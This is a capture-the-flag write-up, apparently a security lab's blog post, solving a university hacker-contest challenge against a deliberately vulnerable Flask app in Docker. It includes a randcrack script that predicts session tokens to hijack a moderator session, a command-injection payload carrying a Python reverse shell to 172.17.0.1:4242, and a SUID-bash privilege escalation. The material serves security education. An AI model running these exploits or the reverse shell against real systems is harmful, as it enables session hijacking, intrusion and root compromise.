{"id":23975,"date":"2025-06-04T09:16:00","date_gmt":"2025-06-04T07:16:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?p=23975"},"modified":"2025-06-04T10:11:48","modified_gmt":"2025-06-04T08:11:48","slug":"write-up-registration-challenge-hacker-contest-summer-25","status":"publish","type":"post","link":"https:\/\/herolab.usd.de\/en\/write-up-registration-challenge-hacker-contest-summer-25\/","title":{"rendered":"Write-Up Registration Challenge Hacker Contest Summer 2025"},"content":{"rendered":"\n

During summer semester of 2025, our \"Hacker Contest\" will be held again Darmstadt University (TU)<\/a> and Darmstadt University of Applied Sciences (h_da)<\/a>. In the popular course, students have the chance to get real insights into IT security and gain hands-on experience with tools and methods to search for vulnerabilities in networks and systems.<\/p>\n\n\n\n

As in every semester, prospective participants took on the Hacker Contest Challenge to qualify for participation.<\/p>\n\n\n\n

If you are curious to know what a Hacker Contest Challenge looks like, or which flags you might have missed this time: This is our sample solution for the summer semester 2025 Hacker Contest Challenge.<\/p>\n\n\n\n

<\/div>\n\n\n\n

Table of Contents <\/h2>\n\n\n\n
    \n
  • Scenario<\/li>\n\n\n\n
  • Challenge<\/li>\n\n\n\n
  • Vulnerabilities<\/li>\n<\/ul>\n\n\n\n
    <\/div>\n\n\n\n

    Scenario<\/h2>\n\n\n\n

    A good friend has asked you to check his self-written website for potential vulnerabilities. He will make it available to you as a Docker container. After your approval, he wants to install the container on a Linux server with a public IP.<\/p>\n\n\n\n

    <\/div>\n\n\n\n

    Challenge<\/h2>\n\n\n\n

    The Challenge provides the docker container which hosts a basic flask web application. Your task is to discover and exploit multiple vulnerabilities and put them into a meaningful attack chain to obtain root access on the docker container.<\/p>\n\n\n\n

    <\/div>\n\n\n\n

    Vulnerabilities<\/h2>\n\n\n\n
    <\/div>\n\n\n\n

    1. Insecure Randomness used for Session Token generation<\/h3>\n\n\n\n

    By examining the way how the application creates session tokens, we see that it uses the getrandbits()<\/code> function of the python library random<\/code> which is known to be insecure cryptographically.<\/p>\n\n\n\n

    webapp\/app.py:136<\/code><\/p>\n\n\n\n

    [...]\n    session = f\"{getrandbits(128):032x}\"\n    in_one_hour = int(time.time()) + SESSION_LIFETIME\n\n    commit_db(\"UPDATE users SET session = ?, session_valid_until = ? WHERE username = ?\", [session, in_one_hour, username])\n\n    response = jsonify({\"success\": True})\n    response.set_cookie(\"session\", session, samesite='strict')\n    return response\n[...]\n```<\/pre>\n\n\n\n
    <\/div>\n\n\n\n
    Using the following script we can exploit the non randomness of getrandbits()<\/code>:<\/p>\n\n\n\n
    from randcrack import RandCrack\nimport requests\nfrom tqdm import tqdm\nfrom secrets import token_hex\n\n\nTARGET = \"http:\/\/localhost:1337\"\n\nusername = token_hex(10)\n\nresp = requests.post(TARGET + \"\/api\/register\", json={\"username\": username, \"password\": username})\n\n\n\nrc = RandCrack()\nfor _ in tqdm(range(624 \/\/ 4)):\n    resp = requests.post(TARGET + \"\/api\/login\", json={\"username\": username, \"password\": username})\n    session = int(resp.cookies[\"session\"], 16)\n    for _ in range(4):\n        rc.submit(session & 0xffffffff)\n        session >>= 32\n\n\nprint(f\"Wait until moderator logged in again. Then use this session: {rc.predict_getrandbits(128):032x}\")<\/pre>\n\n\n\n
    <\/div>\n\n\n\n
    The exploit script logs in as unprivileged user to obtain a valid session token. Then it utilizes the randcrack<\/code> library to predicting the next token that will be generated.
    Following we wait for a moment until the moderator user authenticates against the web application. Then we can hijack his session via the token generated by the exploit.<\/p>\n\n\n\n
    2. Command Injection in Admin Panel<\/h3>\n\n\n\n
    After we obtained the privileged session, we now have access to the admin functions of the website. Here we discovered a command injection in the \/api\/admin\/logs<\/code> endpoint due to missing input sanitation of user controlled data of the unit<\/code> parameter.<\/p>\n\n\n\n
    webapp\/app.py:171-182<\/code>:<\/p>\n\n\n\n
    @app.route('\/api\/admin\/logs', methods=['POST'])\n@only_admin\n@api_guard\ndef get_logs():\n    data = request.json\n    unit = data.get(\"unit\")\n\n    if unit:\n        unit_flag = f\"-u {unit}\"\n    else:\n        unit_flag = \"\"\n\n    data = os.popen(f\"journalctl -n 100 --reverse --no-pager {unit_flag} -o json-seq\").read()<\/pre>\n\n\n\n
    <\/div>\n\n\n\n
    With the command injection we can supply a payload that executes a reverse shell via python that connects to our attacker system.<\/p>\n\n\n\n
    Injected python reverse shell payload:<\/p>\n\n\n\n
    ; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"172.17.0.1\",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"\/bin\/bash\")' #<\/pre>\n\n\n\n
    <\/div>\n\n\n\n
    3. Privilege Escalation using moderator<\/h3>\n\n\n\n
    Now we gained shell access to the Docker container under the web<\/code> user. Looking further to escalate our privileges we see that the file moderator.py<\/code> is writable by our current user.<\/p>\n\n\n\n
    Execute the following command via the rev shell in order to write a payload into the file of the web application that will be executed when moderator is started again:
    echo -e 'import os; os.system(\"chmod +s \/bin\/bash\")' >> moderator.py<\/code><\/p>\n\n\n\n
    Now the \/bin\/bash<\/code> binary has the SUID bit set. Executing bash -p<\/code> yields a shell with euid=0<\/code> and hence we obtained root privileges with this full attack chain.<\/p>\n","protected":false},"excerpt":{"rendered":"
    During summer semester of 2025, our \"Hacker Contest\" will be held again Darmstadt University (TU) and Darmstadt University of Applied Sciences (h_da). In the popular course, students have the chance to get real insights into IT security and gain hands-on experience with tools and methods to search for vulnerabilities in networks and systems. As in […]<\/p>\n","protected":false},"author":117,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"off","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"categories":[76],"tags":[285,193,88,128,86,227],"class_list":["post-23975","post","type-post","status-publish","format-standard","hentry","category-news","tag-darmstadt-university-of-applied-science-en","tag-hacker-contest-en","tag-pentest-en","tag-security-analysis-en","tag-security-research-en","tag-tu-darmstadt-en"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/posts\/23975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/117"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=23975"}],"version-history":[{"count":2,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/posts\/23975\/revisions"}],"predecessor-version":[{"id":23979,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/posts\/23975\/revisions\/23979"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=23975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/categories?post=23975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/tags?post=23975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}